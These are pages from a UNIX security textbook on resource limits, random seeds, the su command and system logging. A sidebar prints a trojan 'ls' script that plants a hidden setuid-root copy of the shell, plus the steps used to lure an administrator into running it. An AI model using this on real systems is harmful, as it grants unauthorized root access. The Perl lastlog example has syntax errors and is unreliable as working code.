stack(kbytes) 8192 kbytes<br />

coredump(blocks) unlimited<br />

nofiles(descriptors) 64<br />

vmemory(kbytes) unlimited<br />

$<br />

These limits have the following meanings:<br />

time<br />

file<br />

[Chapter 25] 25.2 Overload Attacks<br />

data<br />

stack<br />

Maximum number of CPU seconds your process can consume.<br />

Maximum file size that your process can create, reported in 512-byte blocks.<br />

Maximum amount of memory for data space that your process can reference.<br />

Maximum stack your process can consume.<br />

coredump<br />

Maximum size of a core file that your process will write; setting this value to 0 prevents you from writing core files.<br />

nofiles<br />

Number of file descriptors (open files) that your process can have.<br />

vmemory<br />

Total amount of virtual memory your process can consume.<br />

You can also use the ulimit command to change a limit. For example, to prevent any future process you create from writing a<br />

data file longer than 5000 Kilobytes, execute the following command:<br />

$ ulimit -Sf 10000<br />

$ ulimit -Sa<br />

time(seconds) unlimited<br />

file(blocks) 10000<br />

data(kbytes) 2097148 kbytes<br />

stack(kbytes) 8192 kbytes<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch25_02.htm (10 of 11) [2002-04-12 10:44:54]


[Chapter 25] 25.2 Overload Attacks<br />

coredump(blocks) unlimited<br />

nofiles(descriptors) 64<br />

vmemory(kbytes) unlimited<br />

$<br />

To reset the limit, execute this command:<br />

$ ulimit -Sf unlimited<br />

$ ulimit -Sa<br />

ctime(seconds) unlimited<br />

file(blocks) unlimited<br />

data(kbytes) 2097148 kbytes<br />

stack(kbytes) 8192 kbytes<br />

coredump(blocks) unlimited<br />

nofiles(descriptors) 64<br />

vmemory(kbytes) unlimited<br />

$<br />

Note that if you set the hard limit, you cannot increase it again unless you are currently the superuser. This limit may be<br />

handy to use in a system-wide profile to limit all your users.<br />

25.1 Destructive Attacks 25.3 Network Denial of<br />

Service Attacks<br />

[ Library Home | DNS & BIND | TCP/IP | sendmail | sendmail Reference | Firewalls | <strong>Practical</strong> <strong>Sec</strong>urity ]<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch25_02.htm (11 of 11) [2002-04-12 10:44:54]


[Chapter 23] 23.8 Picking a Random Seed<br />

Chapter 23<br />

Writing <strong>Sec</strong>ure SUID and<br />

Network Programs<br />

23.8 Picking a Random Seed<br />

Using a good random number generator is easy. Picking a random seed, on the other hand, can be quite<br />

difficult. Conceptually, picking a random number should be easy: pick something that is always<br />

different. But in practice, picking a random number-especially one that will be used as the basis of a<br />

cryptographic key-is quite difficult. The practice is difficult because many things that change all the time<br />

actually change in predictable ways.<br />

A stunning example of a poorly chosen seed for a random number generator appeared on the front page<br />

of the New York Times [14] in September 1995. The problem was in Netscape Navigator, a popular<br />

program for browsing the World Wide Web. Instead of using truly random information for seeding the<br />

random number generator, Netscape's programmers used a combination of the current time of day, the<br />

PID of the running Netscape program, and the Parent Process ID (PPID). Researchers at the University<br />

of California at Berkeley discovered that they could, through a process of trial and error, discover the<br />

numbers that any copy of Netscape was using and crack the encrypted messages with relative ease.<br />

[14] John Markoff, "<strong>Sec</strong>urity Flaw Is Discovered in Software Used in Shopping," The New<br />

York Times,September 19, 1995 p.1.<br />

Another example of a badly chosen seed generation routine was used in Kerberos version 4. This routine<br />

was based on the time of day XORed with other information. The XOR effectively masked out the other<br />

information and resulted in a seed of only 20 bits of predictable value. This reduced the key space from<br />

more than 72 quadrillion possible keys to slightly more than one million, thus allowing keys to be<br />

guessed in a matter of seconds. When this weakness was discovered at Purdue's COAST Laboratory,<br />

conversations with personnel at MIT revealed that they had known for years that this problem existed,<br />

but the patch had somehow never been released.<br />

In the book Network <strong>Sec</strong>urity, Private Communication in a Public World, Kaufman et al identify three<br />

typical mistakes when picking random-number seeds:<br />

1.<br />

2.<br />

Seeding a random number generator from a limited space.<br />

If you seed your random number generator with an 8-bit number, your generator only has one of<br />

256 possible initial seeds. You will only have 256 possible sequences of random numbers coming<br />

from the function (even if your generator has 128 bytes of internal state).<br />

Using a hash value of only the current time as a random seed.<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch23_08.htm (1 of 3) [2002-04-12 10:44:54]


[Chapter 23] 23.8 Picking a Random Seed<br />

3.<br />

This practice was the problem with the Netscape security bug. The problem was that even though<br />

the <strong>UNIX</strong> operating system API appears to return the current time to the nearest microsecond,<br />

most operating systems have a resolution considerably coarser-usually within one 1/60th of a<br />

second or less. As Kaufman et al point out, if a clock has only 1/60th of a second granularity, and<br />

the intruder knows to the nearest hour at what time the current time was sampled, then there are<br />

only 60x60x60 = 216,000 possible values for the supposedly random seed.<br />

Divulging the seed value itself.<br />

In one case reported by Kaufman et al, and originally discovered by Jeff Schiller of MIT, a<br />

program used the time of day to choose a per-message encryption key. The problem in this case<br />

was that the application included the time that the message was generated in its unencrypted<br />

header of the message.<br />

How do you pick a good random number? Here are some ideas:<br />

1.<br />

2.<br />

3.<br />

4.<br />

Use a genuine source of randomness, such as a radioactive source, static on the FM dial, thermal<br />

noise, or something similar.<br />

Measuring the timing of hard disk drives can be another source of randomness, provided that you<br />

can access the hardware at a sufficiently low level.<br />

Ask the user to type a set of text, and sample the time between keystrokes.<br />

If you get the same amount of time between two keystrokes, throw out the second value; the user<br />

is prob- ably holding down a key and the key is repeating. (This technique is used by PGP as a<br />

source of randomness for its random number generator.)<br />

Monitor the user.<br />

Each time the user presses the keyboard, take the time between the current keypress and the last<br />

keypress, add it to the current random number seed, and hash the result with a cryptographic hash<br />

function. You can also use mouse movements to add still more randomness.<br />

Monitor the computer.<br />

Use readily available, constantly changing information, such as the number of virtual memory<br />

pages that have been paged in, the status of the network, and so forth.<br />

In December 1994, Donald Eastlake, Steve Crocker, and Jeffrey Schiller prepared RFC 1750, which<br />

made many observations about picking seeds for random number generators. Among them:<br />

1.<br />

2.<br />

Avoid relying on the system clock.<br />

Many system clocks are surprisingly non-random. Many clocks which claim to provide accuracy<br />

actually don't, or they don't provide good accuracy all the time.<br />

Don't use Ethernet addresses or hardware serial numbers.<br />

Such numbers are usually "heavily structured" and have "heavily structured subfields." As a result,<br />

one could easily try all of the possible combinations, or guess the value based on the date of<br />

manufacture.<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch23_08.htm (2 of 3) [2002-04-12 10:44:54]


[Chapter 23] 23.8 Picking a Random Seed<br />

3.<br />

4.<br />

5.<br />

Beware of using information such as the time of the arrival of network packets.<br />

Such external sources of randomness could be manipulated by an adversary.<br />

Don't use random selection from a large database (such as a CD-ROM) as a source of randomness.<br />

The reason, according to RFC 1750, is that your adversary may have access to the same database.<br />

The database may also contain unnoticed structure.<br />

Consider using analog input devices already present on your system.<br />

For example, RFC 1750 suggests using the /dev/audio device present on some <strong>UNIX</strong> workstations<br />

as a source of random numbers. The stream is further compressed to remove systematic skew. For<br />

example:<br />

$ cat /dev/audio | compress - >random-bit-stream<br />

RFC 1750 advises that the microphone not be connected to the audio input jack, so that the /dev/audio<br />

device will pick up random electrical noise. This rule may not be true on all hardware platforms. You<br />

should check your hardware with the microphone turned on and with no microphone connected to see<br />

which way gives a "better" source of random numbers.<br />

23.7 <strong>UNIX</strong> Pseudo-Random<br />

Functions<br />

23.9 A Good Random Seed<br />

Generator<br />

[ Library Home | DNS & BIND | TCP/IP | sendmail | sendmail Reference | Firewalls | <strong>Practical</strong> <strong>Sec</strong>urity ]<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch23_08.htm (3 of 3) [2002-04-12 10:44:54]


[Chapter 4] 4.3 su: Changing Who You Claim to Be<br />

Chapter 4<br />

Users, Groups, and the<br />

Superuser<br />

4.3 su: Changing Who You Claim to Be<br />

Sometimes, one user must assume the identity of another. For example, you might sit down at a friend's<br />

terminal and want to access one of your protected files. Rather than forcing you to log your friend out<br />

and log yourself in, <strong>UNIX</strong> gives you a way to change your user ID temporarily. It is called the su<br />

command, short for "substitute user." su requires that you provide the password of the user to whom you<br />

are changing.<br />

For example, to change yourself from tim to john, you might type:<br />

% whoami<br />

tim<br />

% su john<br />

password: fuzbaby<br />

% whoami<br />

john<br />

%<br />

You can now access john's files. (And you will be unable to access tim's files, unless those files are<br />

specifically available to the user john.)<br />

4.3.1 Real and Effective UIDs<br />

Processes on <strong>UNIX</strong> systems have at least two identities at every moment. Normally, these two identities<br />

are the same. The first identity is the real UID. The real UID is your "real identity" and matches up<br />

(usually) with the username you logged in as. Sometimes, you may want to take on the identity of<br />

another user to access some files or execute some commands. You might do this by logging in as that<br />

user, thus obtaining a new command interpreter whose underlying process has a real UID equal to that<br />

user.<br />

Alternatively, if you only want to execute a few commands as another user, you can use the su command,<br />

as described above, to create a new process. This will run a new copy of your command interpreter<br />

(shell), and have the identity (real UID) of that other user. To use the su command, you must either know<br />

the password for the other user's account, or you must currently be running as the superuser.<br />

There are times when a software author wants a single command to execute with the rights and privileges<br />

of another user - most often, the root user. In a case such as this, we certainly don't want to disclose the<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch04_03.htm (1 of 6) [2002-04-12 10:44:55]


[Chapter 4] 4.3 su: Changing Who You Claim to Be<br />

password to the root account, nor do we want the user to have access to a command interpreter running<br />

as root. <strong>UNIX</strong> addresses this problem through the use of a special kind of file designation called setuid or<br />

SUID. When a SUID file is run, the process involved takes on an effective UID that is the same as the<br />

owner of the file, but the real UID remains the same. SUID files are explained in the following chapter.<br />

4.3.2 Saved IDs<br />

Some versions of <strong>UNIX</strong> have a third form of UID: the saved UID. In these systems, a user may run a<br />

setuid program that sets an effective UID of 0 and then sets some different real UID as well. The saved<br />

UID is used by the system to allow the user to set identity back to the original value. Normally, this is not<br />

something the user can see, but it can be important when you are writing or running setuid programs.<br />

4.3.3 Other IDs<br />

<strong>UNIX</strong> also has the analogous concepts of effective GID, real GID, and setgid for groups.<br />

Some versions of <strong>UNIX</strong> also have session IDs, process group IDs, and audit IDs. A session ID is<br />

associated with the processes connected to a terminal, and can be thought of as indicating a "login<br />

session." A process group ID designates a group of processes that are in the foreground or background<br />

on systems that allow job control. An audit ID indicates a thread of activity to be indicated as the same in<br />

the audit mechanism. We will not describe any of these further in this book because you don't really need<br />

to know how they work. However, now you know what they are if you encounter their names.<br />

4.3.4 Becoming the Superuser<br />

Typing su without a username tells <strong>UNIX</strong> that you wish to become the superuser. You will be prompted<br />

for a password. Typing the correct root password causes a shell to be run with a UID of 0. When you<br />

become the superuser, your prompt should change to the pound sign (#) to remind you of your new<br />

powers. For example:<br />

% /bin/su -<br />

password: k697dgf<br />

# whoami<br />

root<br />

#<br />

When using the su command to become the superuser, you should always type the command's full<br />

pathname, /bin/su. By typing the full pathname, you are assuring that you are actually running the real<br />

/bin/su command, and not another command named su that happens to be in your search path. This<br />

method is a very important way of protecting yourself (and the superuser password) from capture by a<br />

Trojan horse. Other techniques are described in Chapter 11. Also see the sidebar in the section the<br />

sidebar "Stealing Superuser" later in this chapter.<br />

Notice the use of the dash shown in the earlier example. Most versions of the su command support an<br />

optional argument of a single dash. When supplied, this causes su to invoke its sub-shell with a dash,<br />

which causes the shell to read all relevant startup files and simulate a login. Using the dash option is<br />

important when becoming a superuser: the option assures that you will be using the superuser's path, and<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch04_03.htm (2 of 6) [2002-04-12 10:44:55]


[Chapter 4] 4.3 su: Changing Who You Claim to Be<br />

not the path of the account from which you su'ed.<br />

To exit the subshell, type exit or press control-D.<br />

If you use the su command to change to another user while you are the su-peruser, you won't be<br />

prompted for the password of the user who you are changing yourself into. (This makes sense; as you're<br />

the superuser, you could as easily change that user's password and then log in as that user.) For example:<br />

# su john<br />

% whoami<br />

john<br />

%<br />

Once you have become the superuser, you are free to perform whatever system administration you wish.<br />

Using su to become the superuser is not a security hole. Any user who knows the superuser password<br />

could also log in as superuser; breaking in through su is no easier. In fact, su enhances security: many<br />

<strong>UNIX</strong> systems can be set up so that every su attempt is logged, with the date, time, and user who typed<br />

the command. Examining these log files allows the system administrator to see who is exercising<br />

superuser privileges - as well as who shouldn't be!<br />

4.3.5 Using su with Caution<br />

If you are the system administrator, you should be careful about how you use the su command.<br />

Remember, if you su to the superuser account, you can do things by accident that you would normally be<br />

protected from doing. You could also accidentally give away access to the superuser account without<br />

knowing you did so.<br />

As an example of the first case, consider the real instance of someone we know who thought that he was<br />

in a temporary directory in his own account and typed rm -rf *. Unfortunately, he was actually in the<br />

/usr/lib directory, and he was operating as the superuser. He spent the next few hours restoring tapes,<br />

checking permissions, and trying to soothe irate users. The moral of this small vignette, and hundreds<br />

more we could relate with similar consequences, is that you should not be issuing commands as the<br />

superuser unless you need the extra privileges. Program construction, testing, and personal<br />

"housecleaning" should all be done under your own user identity.<br />

Another example is when you accidentally execute a Trojan Horse program instead of the system<br />

command you thought you executed. (See the sidebar later in this chapter.) If something like this happens<br />

to you as user root, full access to your system can be given away. We discuss some defenses to this in<br />

Chapter 11, but one major suggestion is worth repeating: if you need access to someone else's files, su to<br />

that user ID and make the accesses as that user rather than as the superuser.<br />

For instance, if a user reports a problem with files in her account, you could su to the root account and<br />

investigate, because you might not be able to access her account or files from your own, regular account.<br />

However, a better approach is to su to the superuser account, and then su to the user's account - you won't<br />

need her password for the su after you are root. Not only does this method protect the root account, but<br />

you will also have some of the same access permissions as the user you are helping, and that would help<br />

you find the problem sooner.<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch04_03.htm (3 of 6) [2002-04-12 10:44:55]


[Chapter 4] 4.3 su: Changing Who You Claim to Be<br />

Stealing Superuser<br />

Once upon a time, many years ago, one of us needed access to the root account on an academic machine.<br />

Although we had been authorized by management to have root access, the local system manager didn't<br />

want to disclose the password. He asserted that access to the root account was dangerous (correct), that<br />

he had far more knowledge of <strong>UNIX</strong> than we did (unlikely), and that we didn't need the access<br />

(incorrect). After several diplomatic and bureaucratic attempts to get access normally, we took a slightly<br />

different approach, with management's wry approval.<br />

We noticed that this user had "." at the beginning of his shell search path. This meant that every time he<br />

typed a command name, the shell would first search the current directory for the command of the same<br />

name. When he did a su to root, this search path was inherited by the new shell. This was all we really<br />

needed.<br />

First, we created an executable shell file named ls in the current directory:<br />

#!/bin/sh<br />

cp /bin/sh ./stuff/junk/.superdude<br />

chmod 4555 ./stuff/junk/.superdude<br />

rm -f $0<br />

exec /bin/ls ${1+"$@"}<br />

Then, we executed the following commands:<br />

% cd<br />

% chmod 700 .<br />

% touch ./-f<br />

The trap was ready. We approached the recalcitrant administrator with the complaint, "I have a funny file<br />

in my directory I can't seem to delete." Because the directory was mode 700, he couldn't list the directory<br />

to see the contents. So, he used su to become user root. Then he changed the directory to our home<br />

directory and issued the command ls to view the problem file. Instead of the system version of ls, he ran<br />

our version. This created a hidden setuid root copy of the shell, deleted the bogus ls command, and ran<br />

the real ls command. The administrator never knew what happened.<br />

We listened politely as he explained (superciliously) that files beginning with a dash character (-) needed<br />

to be deleted with a pathname relative to the current directory (in our case, rm ./-f); of course, we knew<br />

that.<br />

A few minutes later, he couldn't get the new root password.<br />

4.3.6 Restricting su<br />

On some versions of Berkeley-derived <strong>UNIX</strong>, a user cannot su to the root account unless the user is a<br />

member of the process group wheel - or any other group given the group ID of 0. For this restriction to<br />

work, the /etc/group entry for group wheel must be non-empty; if the entry has no usernames listed, the<br />

restriction is disabled, and anyone can su to user root if they have the password.<br />

Some versions of su also allow members of the wheel group to become the superuser by providing their<br />

own passwords instead of the superuser password. The advantage of this feature is that you don't need to<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch04_03.htm (4 of 6) [2002-04-12 10:44:55]


[Chapter 4] 4.3 su: Changing Who You Claim to Be<br />

tell the superuser's password to a user for them to have superuser access - you simply have to put them<br />

into the wheel group. You can take away their access simply by taking them out of the group.<br />

Some versions of System V <strong>UNIX</strong> require that users specifically be given permission to su. Different<br />

versions of <strong>UNIX</strong> accomplish this in different ways; consult your own system's documentation for<br />

details, and use the mechanism if it is available.<br />

Another way to restrict the su program is by making it executable only by a specific group and by<br />

placing in that group only the people who you want to be able to run the command. For information on<br />

how to do this, see "Changing a File's Permissions" in Chapter 5.<br />

4.3.7 The Bad su Log<br />

Most versions of the su command log failed attempts. Older versions of <strong>UNIX</strong> explicitly logged bad su<br />

attempts to the console and in the /var/adm/messages file.[11] Newer versions log bad su attempts<br />

through the syslog facility, allowing you to send the messages to a file of your choice or to log facilities<br />

on remote computers across the network. (Some System V versions log to the file /var/adm/sulog in<br />

addition to syslog, or instead of it.)<br />

[11] Many <strong>UNIX</strong> log files that are currently stored in the /var/adm directory have been<br />

stored in the /usr/adm directory in previous versions of <strong>UNIX</strong>.<br />

If you notice many bad attempts, it may well be an indication that somebody using an account on your<br />

system is trying to gain unauthorized privileges: this might be a legitimate user poking around, or it<br />

might be an indication that the user's account has been appropriated by an outsider who is trying to gain<br />

further access.<br />

A single bad attempt, of course, might simply be a mistyped password, someone mistyping the du<br />

command, or somebody wondering what the su command does.[12]<br />

[12] Which of course leads us to observe that people who try commands to see what they do<br />

shouldn't be allowed to run commands like su once they find out.<br />

You can quickly scan the /var/adm/messages file for bad passwords with the grep command:<br />

% grep BAD /var/adm/messages<br />

BADSU 09/12 18:40 - pts/0 rachel-root<br />

Good su attempts look like this:<br />

% grep + /var/adm/sulog<br />

SU 09/14 23:42 + pts/2 simsong-root<br />

SU 09/16 08:40 + pts/4 simsong-root<br />

SU 09/16 10:34 + pts/3 simsong-root<br />

It would appear that Simson has been busy su'ing to root on September 14th and 16th.<br />

4.3.7.1 The sulog under Berkeley <strong>UNIX</strong><br />

The /var/adm/messages log has a different format on computers running Berkeley <strong>UNIX</strong>:<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch04_03.htm (5 of 6) [2002-04-12 10:44:55]


[Chapter 4] 4.3 su: Changing Who You Claim to Be<br />

% grep su:<br />

Sep 11 01:40:59 bogus.com su: ericx to root on /dev/ttyu0<br />

Sep 12 18:40:02 bogus.com su: BAD su rachel on /dev/ttyp1<br />

In this example, user rachel tried to su on September 12th and failed. This is something we would<br />

investigate further to see if it really was Rachel.<br />

4.3.8 Other Uses of su<br />

On older versions of <strong>UNIX</strong>, the su command was frequently used in the crontab file to cause programs<br />

executed by cron to be run under different user IDs. A line from a crontab file to run the UUCP uuclean<br />

program (which trims the log files in the uucp directory) might have had the form:<br />

0 4 * * * su uucp -c /usr/lib/uucp/uuclean<br />

This use of su is now largely obsolete: the few systems that still use a single crontab file for all users<br />

now allow the username to be specified as the sixth argument on each line of the crontab file:<br />

0 4 * * * uucp /usr/lib/uucp/uuclean<br />

Most versions of <strong>UNIX</strong> now use a version of the cron system that can have a separate crontab file for<br />

each user, and there is no need to specify the username to use. Each file is given the username of the user<br />

for whom it is to be run; that is, cron commands to be run as root are placed in a file called root, while<br />

cron commands to be run as uucp are placed in a file called uucp. These files are often kept in the<br />

directory /usr/spool/cron/crontabs.<br />

Nevertheless, you can still use the su command for running commands under different user names. You<br />

might want to do this in some shell scripts. However, check your documentation as to the proper method<br />

of specifying options to be passed to the command via the su command line.<br />

4.2 Special Usernames 4.4 Summary<br />

[ Library Home | DNS & BIND | TCP/IP | sendmail | sendmail Reference | Firewalls | <strong>Practical</strong> <strong>Sec</strong>urity ]<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch04_03.htm (6 of 6) [2002-04-12 10:44:55]


[Chapter 10] Auditing and Logging<br />

Chapter 10<br />

10. Auditing and Logging<br />

Contents:<br />

The Basic Log Files<br />

The acct/pacct Process Accounting File<br />

Program-Specific Log Files<br />

Per-User Trails in the Filesystem<br />

The <strong>UNIX</strong> System Log (syslog) Facility<br />

Swatch: A Log File Tool<br />

Handwritten Logs<br />

Managing Log Files<br />

After you have established the protection mechanisms on your system, you will need to monitor them. You want to<br />

be sure that your protection mechanisms actually work. You will also want to observe any indications of<br />

misbehavior or other problems. This process of monitoring the behavior of the system is known as auditing. It is<br />

part of a defense-in-depth strategy: to borrow a phrase from several years ago, you should trust, but you should also<br />

verify.<br />

<strong>UNIX</strong> maintains a number of log files that keep track of what's been happening to the computer. Early versions of<br />

<strong>UNIX</strong> used the log files to record who logged in, who logged out, and what they did. Newer versions of <strong>UNIX</strong><br />

provide expanded logging facilities that record such information as files that are transferred over the network,<br />

attempts by users to become the superuser, electronic mail, and much more.<br />

Log files are an important building block of a secure system: they form a recorded history, or audit trail, of your<br />

computer's past, making it easier for you to track down intermittent problems or attacks. Using log files, you may be<br />

able to piece together enough information to discover the cause of a bug, the source of a break-in, and the scope of<br />

the damage involved. In cases where you can't stop damage from occurring, at least you will have some record of it.<br />

Those logs may be exactly what you need to rebuild your system, conduct an investigation, give testimony, recover<br />

insurance money, or get accurate field service performed.<br />

But beware: Log files also have a fundamental vulnerability. Because they are often recorded on the system itself,<br />

they are subject to alteration or deletion. As we shall see, there are techniques that may help you to mitigate this<br />

problem, but no technique can completely remove it unless you log to a different machine.<br />

Locating to a different machine is actually a good idea even if your system supports some other techniques to store<br />

the logs. Consider some method of automatically sending log files to a system on your network in a physically<br />

secured location. For example, sending logging information to a PC or Apple Macintosh provides a way of storing<br />

the logs in a machine that is considerably more difficult to break into and disturb. We have heard good reports from<br />

people who are able to use "outmoded" 80486 or 80386 PCs as log machines. For a diagram of such a setup, see<br />

Figure 10.1.<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch10_01.htm (1 of 9) [2002-04-12 10:44:56]


[Chapter 10] Auditing and Logging<br />

Figure 10.1: <strong>Sec</strong>ure logging host.<br />

10.1 The Basic Log Files<br />

Most log files are text files that are written line by line by system programs. For example, each time a user on your<br />

system tries to become the superuser by using the su command, the su program may append a single line to the log<br />

file sulog, which records whether the su attempt was successful or not.<br />

Different versions of <strong>UNIX</strong> store log files in different directories. The most common locations are:<br />

/usr/adm Used by early versions of <strong>UNIX</strong><br />

/var/adm Used by newer versions of <strong>UNIX</strong>, so that the /usr partition can be mounted read-only<br />

/var/log Used by some versions of Solaris, Linux, BSD, and free BSD to store log files<br />

Within one of these directories (or a subdirectory in one of them) you may find variants of some or all of the<br />

following files:<br />

acct or pacct Records commands run by every user<br />

aculog Records of dial-out modems (automatic call units)<br />

lastlog Logs each user's most recent successful login time, and possibly the last unsuccessful login too<br />

loginlog Records bad login attempts<br />

messages Records output to the system's "console" and other messages generated from the syslog facility<br />

sulog Logs use of the su command<br />

utmp[1] Records each user currently logged in<br />

utmpx Extended utmp<br />

wtmp[2] Provides a permanent record of each time a user logged in and logged out. Also records system<br />

shutdowns and startups<br />

wtmpx Extended wtmp<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch10_01.htm (2 of 9) [2002-04-12 10:44:56]


[Chapter 10] Auditing and Logging<br />

vold.log Logs errors encountered with the use of external media, such as floppy disks or CD-ROMS<br />

xferlog Logs FTP access<br />

[1] Most versions of <strong>UNIX</strong> store the utmp file in the /etc directory.<br />

[2] Early versions of System V <strong>UNIX</strong> stored the wtmp file in the /etcdirectory<br />

The following sections describe some of these files and how to use the <strong>UNIX</strong> syslog facility.<br />

C2 Audit<br />

Many <strong>UNIX</strong> systems allow the administrator to enable a comprehensive type of auditing (logging) known as " C2<br />

audit." This is so-named because it is logging of the form specified by U.S. Department of Defense regulations to<br />

meet the certification at the C2 level of trust. These regulations are specified in a document called the Trusted<br />

Computer System Evaluation Criteria (often referred to as the "Orange Book" in the "Rainbow Series").<br />

C2 auditing generally means assigning an audit ID to each group of related processes, starting at login. Thereafter,<br />

certain forms of system calls performed by every process are logged with the audit ID. This includes calls to open<br />

and close files, change directory, alter user process parameters, and so on.<br />

Despite the mandate for the general content of such logging, there is no generally accepted standard for the format.<br />

Thus, each vendor that provides C2-style logging seems to have a different format, different controls, and different<br />

locations for the logs. If you feel the need to set such logging on your machine, we recommend that you read the<br />

documentation carefully. Furthermore, we recommend that you be careful about what you log so as not to generate<br />

lots of extraneous information, and that you log to a disk partition with lots of space.<br />

The last suggestion, above, reflects one of the biggest problems with C2 audit: it can consume a huge amount of<br />

space on an active system in a short amount of time. The other main problem with C2 audit is that it is useless<br />

without some interpretation and reduction tools, and these are not generally available from vendors - the DoD<br />

regulations only require that the logging be done, not that it be usable! Vendors have generally provided only as<br />

much as is required to meet the regulations and no more.<br />

Only a few third-party companies provide intrusion detection or audit-analysis tools: Stalker, from Haystack<br />

Laboratories, is one such product with some sophisticated features. Development of more sophisticated tools is an<br />

ongoing, current area of research for many people. We hope to be able to report something more positive in a third<br />

edition of this book.<br />

In the meantime, if you are not using one of these products, and you aren't at a DoD site that requires C2 logging,<br />

you may not want to enable C2 logging (unless you like filling up your disks with data you may not be able to<br />

interpret). On the other hand, if you have a problem, the more logging you have, the more likely you will be able to<br />

determine what happened. Therefore, review the documentation for the audit tools provided with your system if it<br />

claims C2 audit capabilities, and experiment with them to determine if you want to enable the data collection.<br />

10.1.1 lastlog File<br />

<strong>UNIX</strong> records the last time that each user logged into the system in the lastlog log file. This time is displayed each<br />

time you log in:<br />

login: ti<br />

password: books2sell<br />

Last login: Tue Jul 12 07:49:59 on tty01<br />

This time is also reported when the finger command is used:<br />

% finger tim<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch10_01.htm (3 of 9) [2002-04-12 10:44:56]


[Chapter 10] Auditing and Logging<br />

Login name: tim In real life: Tim Hack<br />

Directory: /Users/tim Shell: /bin/csh<br />

Last login Tue Jul 12 07:49:59 on tty01<br />

No unread mail<br />

No Plan.<br />

%<br />

Some versions of System V <strong>UNIX</strong> display both the last successful login and the last unsuccessful login when a user<br />

logs into the system:<br />

login: tim<br />

password: books2sell<br />

Last successful login for tim : Tue Jul 12 07:49:59 on tty01<br />

Last unsuccessful login for tim : Tue Jul 06 09:22:10 on tty01<br />

Teach your users to check the last login time each time they log in. If the displayed time doesn't correspond to the<br />

last time they used the system, somebody else might have been using their account. If this happens, the user should<br />

immediately change the account's password and notify the system administrator.<br />

Unfortunately, the design of the lastlog mechanism is such that the previous contents of the file are overwritten at<br />

each login. As a result, if a user is inattentive for even a moment, or if the login message clears the screen, the user<br />

may not notice a suspicious time. Furthermore, even if a suspicious time is noted, it is no longer available for the<br />

system administrator to examine.<br />

One way to compensate for this design flaw is to have a cron-spawned task periodically make an on-disk copy of the<br />

file that can be examined at a later time. For instance, you could have a shell file run every six hours to do the<br />

following:<br />

mv /var/adm/lastlog.3 /var/adm/lastlog.4<br />

mv /var/adm/lastlog.2 /var/adm/lastlog.3<br />

mv /var/adm/lastlog.1 /var/adm/lastlog.2<br />

cp /var/adm/lastlog /var/adm/lastlog.1<br />

This will preserve the contents of the file in six-hour periods. If backups are done every day, then they will also be<br />

preserved to the backups for examination later.<br />

If you have saved copies of the lastlog file, you will need a way to read the contents. Unfortunately, there is no<br />

utility under standard versions of <strong>UNIX</strong> that allows you to read one of these files and print all the information.<br />

Therefore, you need to write your own. The following Perl script will work on SunOS systems, and you can modify<br />

it to work on others.[3]<br />

[3] The layout of the lastlog file is usually documented in an include file such as /usr/include/lastlog.h<br />

Example 10.1: Script that Reads lastlog File.<br />

#!/usr/local/bin/perl<br />

$fname = (shift || "/var/adm/lastlog");<br />

$halfyear = 60*60*24*365.2425/2; # pedantry abounds<br />

setpwent;<br />

while (($name, $junk, $uid) = getpwent) {<br />

$names{$uid} = $name;<br />

}<br />

endpwent;<br />

open(LASTL, $fname);<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch10_01.htm (4 of 9) [2002-04-12 10:44:56]


[Chapter 10] Auditing and Logging<br />

for (uid = 0; read(LASTL, $record, 28); $uid++) {<br />

( $time, $line, $host) = unpack('l A8 A16', $record);<br />

next unless $time;<br />

$host = "($host)" if $host;<br />

($sec, $min, $hour, $mday, $mon, $year) = localtime($time);<br />

$year += 1900 + ($year < 70 ? 100 : 0);<br />

print $names{$uid}, $line, "$mday/$mon";<br />

print (time - $time > $halfyear) ? "/$year" : " "$hour:$min";<br />

print " $host\n";<br />

}<br />

close LASTL;<br />

This program starts by checking for a command-line argument (the "shift"); if none is present, it uses the default. It<br />

then calculates the number of seconds in half a year, to be used to determine the format of the output (logins more<br />

than six months in the past are printed differently). Next, it builds an associative array of UIDS to login names.<br />

After this initialization, the program reads a record at a time from the lastlog file. Each binary record is then<br />

unpacked and decoded. The stored time is decoded into something more understandable, and then the output is<br />

printed.<br />

While the lastlog file is designed to provide quick access to the last time that a person logged into the system, it does<br />

not provide a detailed history recording the use of each account. For that, <strong>UNIX</strong> uses the wtmp log file.<br />

10.1.2 utmp and wtmp Files<br />

<strong>UNIX</strong> keeps track of who is currently logged into the system with a special file called /etc/utmp. This is a binary file<br />

that contains a record for every active tty line, and generally does not grow to be more than a few kilobytes in length<br />

(at the most). A second file, /var/adm/wtmp, keeps track of both logins and logouts. This file grows every time a<br />

user logs in or logs out, and can grow to be many megabytes in length unless it is pruned.<br />

In Berkeley-derived versions of <strong>UNIX</strong>, the entries in the utmp and wtmp files contain:<br />

●<br />

●<br />

●<br />

●<br />

Name of the terminal device used for login<br />

Username<br />

Hostname that the connection originated from, if the login was made over a network<br />

Time that the user logged on<br />

In System V <strong>UNIX</strong>, the wtmp file is placed in /etc/wtmp and is also used for accounting. The AT&T System V.3.2<br />

utmp and wtmp entries contain:<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

Username<br />

Terminal line number<br />

Device name<br />

Process ID of the login shell<br />

Code that denotes the type of entry<br />

Exit status of the process<br />

